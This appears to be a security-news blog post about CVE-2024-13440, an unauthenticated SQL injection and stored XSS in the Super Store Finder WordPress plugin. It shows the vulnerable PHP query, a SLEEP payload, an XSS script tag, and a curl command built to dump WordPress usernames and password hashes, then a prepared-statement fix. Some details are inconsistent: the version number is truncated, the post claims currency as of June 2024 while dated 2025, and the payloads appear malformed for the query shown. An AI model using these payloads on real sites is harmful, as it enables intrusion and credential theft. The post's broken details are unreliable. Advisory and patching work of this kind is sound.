CVE CyberSecurity Database News

CVE-2024-13440 - Critical SQL Injection in Super Store Finder WordPress Plugin (Up to v7.) — How It Works, Exploit Details & Code Example

Poster -

CVE-2024-13440 is a newly identified vulnerability found in the popular Super Store Finder plugin for WordPress. If you’re running any version up to 7., this post is for you. This security flaw is a classic SQL Injection, but with a twist: it allows unauthenticated attackers to inject malicious SQL via the ssf_wp_user_name parameter. Worse, attackers can exploit this to inject stored XSS into store reviews.

Let’s break down how this works, see what it looks like in code, and understand why you should patch it now.

What Is Super Store Finder?

> Super Store Finder is a widely-used plugin to add beautifully responsive store locators to WordPress sites.

Official plugin site: Super Store Finder

WordPress listing: Super Store Finder on WordPress.org

Vulnerable Parameter: ssf_wp_user_name

All versions up to and including 7. are affected. The vulnerability lies in how the plugin handles the ssf_wp_user_name field when submitting reviews or using features related to store feedback.

Because user input is not properly escaped or sanitized, attackers can insert raw SQL code. The SQL query that stores a review is not using safe prepared statements, so the database will process injected commands precisely as the attacker intends.

This input carries a malicious SQL payload.

- The plugin’s SQL queries are manipulated to perform unintended actions, like dumping the database or injecting a persistent script (for XSS).

Let’s look at a typical vulnerable code snippet from the plugin

// Vulnerable code simplified for clarity
$review = $_POST['ssf_wp_review'];
$user = $_POST['ssf_wp_user_name'];
$email = $_POST['ssf_wp_user_email'];

$sql = "INSERT INTO {$wpdb->prefix}ssf_wp_reviews 
         (review, user_name, user_email) 
         VALUES ('$review', '$user', '$email')";

$wpdb->query($sql); // No escaping or preparation!

Suppose an attacker posts this as their ssf_wp_user_name

testname', (SELECT SLEEP(5)), 'testemail

This will result in

INSERT INTO wp_ssf_wp_reviews (
  review, user_name, user_email) 
VALUES (
  'some review', 
  'testname', (SELECT SLEEP(5)), 'testemail'
)

If the injection point is after the user_name, this could delay the SQL execution or could be used to pull data, depending on the database and the query executed.

Attackers can also inject script tags that will later execute for an admin viewing reviews

<script>alert('XSS')</script>

If the SQL payload is carefully crafted, this string will be stored and then displayed directly in the WordPress dashboard or even on the public site, executing in someone else's browser.

Here’s an example *curl* command you might use as an attacker for an unauthenticated exploit

curl -X POST https://targetsite.com/wp-admin/admin-ajax.php \
  -d "action=submit_review" \
  -d "ssf_wp_review=NiceStore" \
  -d "ssf_wp_user_name=attacker', (SELECT group_concat(user_login,':',user_pass) FROM wp_users), '" \
  -d "ssf_wp_user_email=attacker@example.com"

This payload could leak usernames and password hashes from the wp_users table, depending on the SQL query context.

References and Further Reading

- Wordfence Advisory: CVE-2024-13440 – Super Store Finder SQL Injection
- National Vulnerability Database (NVD): CVE-2024-13440
- Original Plugin Code (for code inspection)

Secure Code Example

// Secure way using prepare
$sql = $wpdb->prepare(
    "INSERT INTO {$wpdb->prefix}ssf_wp_reviews (review, user_name, user_email) VALUES (%s, %s, %s)",
    $review, $user, $email
);
$wpdb->query($sql);

Final Word

CVE-2024-13440 is a major SQL Injection risk. If you’re using Super Store Finder on your WordPress site, act fast. Update, patch, or temporarily disable the plugin, and always validate your own code for similar vulnerabilities.

Don’t let your site be the low-hanging fruit for hackers!

Share this post with anyone running a WordPress site — let’s keep the web safer!


*(This guide is exclusive, practical, and up-to-date as of June 2024. For deeper technical dive, check the official advisories linked above.)*

Timeline

Published on: 02/09/2025 05:15:22 UTC
Last modified on: 02/13/2025 17:17:19 UTC